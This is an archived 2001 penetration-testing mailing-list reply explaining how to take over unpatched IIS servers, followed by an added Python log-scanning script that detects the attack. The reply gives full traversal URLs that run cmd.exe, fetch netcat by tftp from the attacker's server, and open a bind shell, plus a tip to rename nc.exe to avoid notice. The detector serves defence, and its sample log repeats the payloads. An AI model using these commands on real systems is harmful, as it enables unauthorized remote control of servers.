Penetration Testing mailing list archives

Re: Ideas on netcat


From: "Assess" <assess () cmsecurenet com>
Date: Mon, 27 Aug 2001 18:01:35 -0400

This is a simple way to take over an IIS web server without the unicode
patch. It requires that the firewall has TFTP outbound active and an inbound
port available with nothing loaded on it. While several things must occur for
this to work I have had it work twice out of ten assessments so the odds may
still be good. You may want to rename nc.exe to something less obvious.

Get Netcat from your tftp server

http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe

Start netcat on port 23 or any port that is open inbound, and unused, through
the firewall. TCP port 53 works more often than not if DNS has been
configured incorrectly.

http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe

Telnet to the port on the target system. If it works you should have a c:\
prompt.

----- Original Message -----
From: "Vo0d0o" <voodooo () rediffmail com>
To: <pen-test () securityfocus com>
Sent: Friday, August 24, 2001 2:29 AM
Subject: Ideas on netcat



To all netcat gurus,

I have been experimenting on netcat for a few days and searching almost
every day on netcat for some possible uses, but in vain.

As far as I know, no site is giving some other uses of netcat pertaining to
pen-testing ...other than the usual *README* file which I find too basic.

I would be grateful if anybody could throw some light on uses of netcat in
pen-testing.

Thanks in advance.

Cheers,
Kartik.






----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
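
A defender's view of the requests in the message above, as an added example that is not part of the original post: a log check that percent-decodes each request path until it stops changing, then flags double-encoded traversal to cmd.exe and the tftp/netcat command lines. The log field order, the sample lines and the documentation-range IP addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote

TRAVERSAL = re.compile(r"\.\.[\\/]")                # ../ or ..\ once fully decoded
SHELL = re.compile(r"\bcmd\.exe\b", re.I)
TOOLS = re.compile(r"\b(tftp|nc)(\.exe)?\b", re.I)  # tools named in the message

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(stem, query):
    """Return the reasons a request resembles the ones described above."""
    stem_dec, stem_rounds = fully_decode(stem)
    query_dec, _ = fully_decode(query.replace("+", " "))
    reasons = []
    if stem_rounds > 1:                 # %255c -> %5c -> \ takes two rounds
        reasons.append("double-encoded-path")
    if TRAVERSAL.search(stem_dec):
        reasons.append("path-traversal")
    if SHELL.search(stem_dec):
        reasons.append("cmd.exe-in-path")
    if TOOLS.search(query_dec):
        reasons.append("tftp-or-netcat-in-query")
    return reasons

# Constructed sample log; assumed fields: c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = r"""
198.51.100.7 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+tftp.exe+-i+192.0.2.10+GET+nc.exe+c:\nc.exe 200
198.51.100.7 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe 200
203.0.113.5 GET /default.asp - 200
203.0.113.5 GET /docs/a%20b.htm id=42&func=sync 200
"""

def scan(log_text):
    """Return (client ip, status, reasons) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ip, method, stem, query, status = line.split()
        reasons = classify(stem, query)
        if reasons:
            hits.append((ip, status, reasons))
    return hits
```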



